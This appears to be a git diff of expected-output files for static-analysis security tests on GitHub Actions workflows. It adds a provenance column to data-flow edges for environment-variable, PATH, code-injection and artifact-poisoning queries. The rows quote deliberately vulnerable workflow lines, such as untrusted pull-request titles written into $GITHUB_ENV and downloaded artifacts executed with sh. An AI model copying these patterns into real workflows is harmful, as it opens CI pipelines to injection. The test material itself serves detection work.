.github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | | nodes | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index a6be99e1bd05..8589d82d8259 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -1,9 +1,9 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | -| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | -| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index c6091f1fc239..7fab238795c6 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index d3b90de71e32..ea360bc56df0 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index ffaaf91e5504..0dbff9553183 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 28fffe0e5e4d..5641ea53afd2 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f7b4ae7bc117..fdb5beb09aa0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,84 +1,84 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 193eee3b66cc..a18aa5bdc80e 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,17 +1,17 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run 